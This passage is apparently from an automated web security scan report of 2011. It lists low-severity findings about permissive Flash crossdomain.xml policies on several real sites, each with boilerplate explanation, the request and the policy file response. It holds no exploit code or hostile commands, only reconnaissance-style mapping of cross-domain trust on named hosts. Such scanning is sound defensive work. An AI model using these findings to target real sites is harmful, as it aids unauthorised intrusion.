<allow-access-from domain="208.82.66.14" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.15" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.16" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.17" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.18" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.19" secure="true" />
...[SNIP]...
<allow-access-from domain="69.25.20.216" secure="true" />
...[SNIP]...
<allow-access-from domain="stage-user-comcast.com" secure="false" />
...[SNIP]...
<allow-access-from domain="24.40.23.69" secure="false" />
...[SNIP]...
<allow-access-from domain="68.87.60.144" secure="false" />
...[SNIP]...
<allow-access-from domain="*.acxiomdigital.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.jellyvision-conversation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="159.153.236.12" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.progressive.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.materialdev.com" secure="false" />
...[SNIP]...

6.86. http://developers.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: developers.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.28.34.106
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

6.87. http://disqus.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://disqus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: disqus.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:27 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
X-User: anon:608614822849
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Connection: close
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.usopen.org" to-ports="80,96" secure="false" />
...[SNIP]...

6.88. http://espn.go.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://espn.go.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: espn.go.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5184000
Connection: close
Date: Sun, 04 Sep 2011 01:22:27 GMT
Content-Type: text/xml
Last-Modified: Thu, 25 Aug 2011 19:50:02 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N730
Cache-Expires: Tue, 01 Nov 2011 19:32:31 GMT
Content-Length: 7286
Vary: Accept-Encoding

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="profiles.sportsnation.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="profiles.staging.espnfp.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.starwave.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adsatt.espn.starwave.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.static.espn.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.abclocal.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.corp.espn3.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.espncdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.pointroll.com" to-ports="*"/>
   <allow-access-from domain="*.2mdn.net" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="m.uk.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.fr.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.se.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.de.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.arn.com"/>
   <allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.edgefcs.net" secure="false" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="clearspring.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.clearspring.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.espnmediaflo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="host-a.oddcast.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="host-d.oddcast.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="host.staging.oddcast.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.l4b3l.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.atdmt.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.wknewyork.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.wknyc.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.yournbadestination.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.nba.com" to-ports="*"/>
   <allow-access-from domain="hive.cachefly.net" to-ports="*" />
...[SNIP]...
<allow-access-from domain="espn.nanogaming.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.dolimg.com" to-ports="*"/>
   <allow-access-from domain="*.yieldmanager.com" to-ports="*"/>
   <allow-access-from domain="*.akqa.com" to-ports="*"/>
   <allow-access-from domain="*.designbloxlive.com" to-ports="*"/>
   <allow-access-from domain="ds.serving-sys.com" to-ports="*"/>
   <allow-access-from domain="*.arndev.com" to-ports="*"/>
   <allow-access-from domain="nascar.blitzagency.com" to-ports="*"/>
   <allow-access-from domain="*.abc.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.vml.com" to-ports="*"/>
   <allow-access-from domain="*.vmltest.com" to-ports="*"/>
   <allow-access-from domain="*.vmldev.com" to-ports="*"/>
   <allow-access-from domain="*.vmlstage.com" to-ports="*"/>
   <allow-access-from domain="*.collegegameday.com" to-ports="*"/>
   <allow-access-from domain="dev.sarkissianmason.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.streamtheworld.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.adsfac.us" secure="true" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.corp.dig.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.google.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.youtube.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ytimg.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.client-projects.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="173.45.231.98" to-ports="*"/>
   <allow-access-from domain="abcpreview.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.theview.pseudosisu.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.theview.tv" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="redinter.vo.llnwd.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.soapnet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="cdn.media.soapnet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="sn.soapnet.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="jayski.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.eyewonder.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.eyewonderlabs.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.squarewave.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="wpc.0C74.edgecastcdn.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.heavenspotdev.com" secure="true" />
...[SNIP]...
<allow-access-from domain="votecollector.go.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.espndb.com"/>
   <allow-access-from domain="*.foxtel.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.unicast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.verizon.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.verizon.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.espn.pvt" to-ports="*"/>
   <allow-access-from domain="*.xif.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dartmotif.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.miclients.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adimages.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.questionmarket.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="all360poker.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.adinterax.com" />
   <allow-access-from domain="infinitidev.tbwachiatdev.com" />
   <allow-access-from domain="*.coachespicmixerterms.com" />
   <allow-access-from domain="*.coachpicmixerprivacypolicy.com" />
   <allow-access-from domain="*.ooyala.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.playdom.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sportsR.us" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.mycorplink.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.fanflex.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="preview.espncreativeworks.com" to-ports="*" secure="false"/>
...[SNIP]...

6.89. http://friendfeed.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://friendfeed.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: friendfeed.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 321
Vary: Cookie
Server: FriendFeedServer/0.1
Etag: "d69a789b2865b15041af5e97e97c7b933b34666a"
Cache-Control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"

<cross-domain-policy xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.friendfeed.com"/>
<site-control permitted-cross-domain-policies="mast
...[SNIP]...

6.90. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Sat, 03 Sep 2011 23:16:24 GMT
Expires: Sun, 04 Sep 2011 23:16:24 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 7573
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.91. http://grfx.cstv.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://grfx.cstv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: grfx.cstv.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1717425046"
Last-Modified: Tue, 30 Aug 2011 23:41:52 GMT
Content-Length: 909
Server: lighttpd/1.4.19
Date: Sun, 04 Sep 2011 00:45:29 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.fansonly.com" />
<allow-access-from domain="*.initinteractive.com" />
<allow-access-from domain="174.132.109.106" />
<allow-access-from domain="*.cstv.com" />
<allow-access-from domain="*.ocsn.com" />
<allow-access-from domain="*.collegesports.com" />
<allow-access-from domain="livestats.*.fansonly.com" />
<allow-access-from domain="livestats.*.cstv.com" />
<allow-access-from domain="livestats.*.collegesports.com" />
<allow-access-from domain="*.rolltide.com" />
<allow-access-from domain="*.ucirvinesports.com" />
<allow-access-from domain="*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="flv.sales.cbs.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mediapm.edgesuite.net" secure="false" />
...[SNIP]...

6.92. http://ocp.ncaa.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ocp.ncaa.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ocp.ncaa.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:08 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 7358
Keep-Alive: timeout=15, max=970
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bnet.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.cbsaroundtheworld.com" />
<allow-access-from domain="*.cbsgames.com" />
<allow-access-from domain="*.cbsig.net"/>
<allow-access-from domain="*.cbsnews.com" />
<allow-access-from domain="*.cbssports.com" />
<allow-access-from domain="*.chat.com" />
<allow-access-from domain="*.chow.com" />
<allow-access-from domain="*.chowhound.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="*.cnettv.com" />
<allow-access-from domain="*.com.com" />
<allow-access-from domain="*.download.com" />
<allow-access-from domain="*.filmspot.com" />
<allow-access-from domain="*.findarticles.com" />
<allow-access-from domain="*.gamefaqs.com" />
<allow-access-from domain="*.gamerankings.com" />
<allow-access-from domain="*.gamespot.com" />
<allow-access-from domain="*.help.com" />
<allow-access-from domain="*.iphoneatlas.com" />
<allow-access-from domain="*.itpapers.com" />
<allow-access-from domain="*.juke.com" />
<allow-access-from domain="*.last.fm" />
<allow-access-from domain="*.macfixit.com" />
<allow-access-from domain="*.macfixitforums.com" />
<allow-access-from domain="*.maxpreps.com" />
<allow-access-from domain="*.metacritic.com" />
<allow-access-from domain="*.mp3.com" />
<allow-access-from domain="*.moblogic.tv" />
<allow-access-from domain="*.moneywatch.com" />
<allow-access-from domain="*.movietome.com" />
<allow-access-from domain="*.mysimon.com" />
<allow-access-from domain="*.ncaa.com" />
<allow-access-from domain="*.news.com" />
<allow-access-from domain="*.ourchart.com" />
<allow-access-from domain="*.reuters.com" />
<allow-access-from domain="*.search.com" />
<allow-access-from domain="*.shareware.com" />
<allow-access-from domain="*.shopper.com" />
<allow-access-from domain="*.smartplanet.com" />
<allow-access-from domain="*.sportsgamer.com" />
<allow-access-from domain="*.sportsline.com" />
<allow-access-from domain="*.startrek.com" />
<allow-access-from domain="*.techrepublic.com" />
<allow-access-from domain="*.theinsider.com" />
<allow-access-from domain="*.trupreps.com" />
<allow-access-from domain="*.tv.com" />
<allow-access-from domain="*.urbanbaby.com" />
<allow-access-from domain="*.versiontracker.com" />
<allow-access-from domain="*.wallstrip.com" />
<allow-access-from domain="*.webware.com" />
<allow-access-from domain="*.winfiles.com" />
<allow-access-from domain="*.zdnet.com" />
<allow-access-from domain="*.zdnet.com.au" />
<allow-access-from domain="*.zdnet.com.uk" />
<allow-access-from domain="*.zdnetasia.com" />
<allow-access-from domain="*.cbsinteractive.com" />
<allow-access-from domain="*.powervideosuite.com" />
...[SNIP]...
<allow-access-from domain="*.clipsync.com"/>
...[SNIP]...
<allow-access-from domain="212.86.251.190"/>
...[SNIP]...
<allow-access-from domain="*.crunchyroll.com" />
...[SNIP]...
<allow-access-from domain="*.techmatter.com" />
...[SNIP]...
<allow-access-from domain="*.amazon.com" />
...[SNIP]...
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.att.com" />
<allow-access-from domain="*.attributor.com" />
<allow-access-from domain="*.bebo.com" />
<allow-access-from domain="*.blinkx.com" />
<allow-access-from domain="*.boxee.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.buddytv.com" />
<allow-access-from domain="*.cbsmobile.com" />
<allow-access-from domain="*.chumby.com" />
<allow-access-from domain="*.comcast.com" />
<allow-access-from domain="*.comcastnet.com" />
<allow-access-from domain="*.cooliris.com" />
<allow-access-from domain="*.dell.com" />
<allow-access-from domain="*.et.com" />
<allow-access-from domain="*.fanpop.com" />
<allow-access-from domain="*.freestream.com" />
<allow-access-from domain="*.fuhu.com" />
<allow-access-from domain="*.gotuit.com" />
<allow-access-from domain="*.grabnetworks.com" />
<allow-access-from domain="*.harpers.com" />
<allow-access-from domain="*.hp.com" />
<allow-access-from domain="*.imdb.com" />
<allow-access-from domain="*.iwidget.com" />
<allow-access-from domain="*.joost.com" />
<allow-access-from domain="*.meevee.com" />
<allow-access-from domain="*.metacafe.com" />
<allow-access-from domain="*.msn.com" />
<allow-access-from domain="*.msnsearch.com" />
<allow-access-from domain="*.netflix.com" />
<allow-access-from domain="*.radio.com" />
<allow-access-from domain="*.sands.com" />
<allow-access-from domain="*.showtime.com" />
<allow-access-from domain="*.slide.com" />
<allow-access-from domain="*.sling.com" />
<allow-access-from domain="*.sony.com" />
<allow-access-from domain="*.tidaltv.com" />
<allow-access-from domain="*.transpond.com" />
<allow-access-from domain="*.tvguide.com" />
<allow-access-from domain="*.tvstations.com" />
<allow-access-from domain="*.veoh.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.youtube.com" />
...[SNIP]...
<allow-access-from domain="*.bing.com" />
...[SNIP]...
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.fancast.com" />
<allow-access-from domain="*.blinx.com" />
<allow-access-from domain="apps.facebook.com" />
...[SNIP]...
<allow-access-from domain="*.ytimg.com"/>
...[SNIP]...
<allow-access-from domain="*.ustream.tv"/>
...[SNIP]...
<allow-access-from domain="*.sho.com"/>
...[SNIP]...
<allow-access-from domain="*.cbsinteractive.com.au"/>
...[SNIP]...
<allow-access-from domain="*.quantserve.com"/>
...[SNIP]...
<allow-access-from domain="*.cbsimg.net" />
...[SNIP]...
<allow-access-from domain="*.yahoo.net"/>
...[SNIP]...
<allow-access-from domain="*.yimg.com"/>
...[SNIP]...
<allow-access-from domain="*.ooyala.com"/>
...[SNIP]...
<allow-access-from domain="*.yldmgrimg.net"/>
...[SNIP]...
<allow-access-from domain="*.cstv.com"/>
...[SNIP]...
<allow-access-from domain="*.eyewonderlabs.com"/>
...[SNIP]...
<allow-access-from domain="*.eyewonder.com"/>
...[SNIP]...
<allow-access-from domain="*.maxpreps.com.edgesuite.net"/>
...[SNIP]...
<allow-access-from domain="*.livestream.com"/>
...[SNIP]...
<allow-access-from domain="*.justin.tv"/>
...[SNIP]...
<allow-access-from domain="*.adap.tv"/>
...[SNIP]...
<allow-access-from domain="*.dev.cbssports.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net"/>
<allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.g.doubleclick.net"/>
<allow-access-from domain="*.liverail.com"/>
...[SNIP]...

6.93. http://onlyfans.cstv.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://onlyfans.cstv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: onlyfans.cstv.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:34 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Last-Modified: Tue, 30 Aug 2011 23:41:52 GMT
Accept-Ranges: bytes
Content-Length: 909
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.fansonly.com" />
<allow-access-from domain="*.initinteractive.com" />
<allow-access-from domain="174.132.109.106" />
<allow-access-from domain="*.cstv.com" />
<allow-access-from domain="*.ocsn.com" />
<allow-access-from domain="*.collegesports.com" />
<allow-access-from domain="livestats.*.fansonly.com" />
<allow-access-from domain="livestats.*.cstv.com" />
<allow-access-from domain="livestats.*.collegesports.com" />
<allow-access-from domain="*.rolltide.com" />
<allow-access-from domain="*.ucirvinesports.com" />
<allow-access-from domain="*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="flv.sales.cbs.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mediapm.edgesuite.net" secure="false" />
...[SNIP]...

6.94. http://optimized-by.rubiconproject.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:00 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
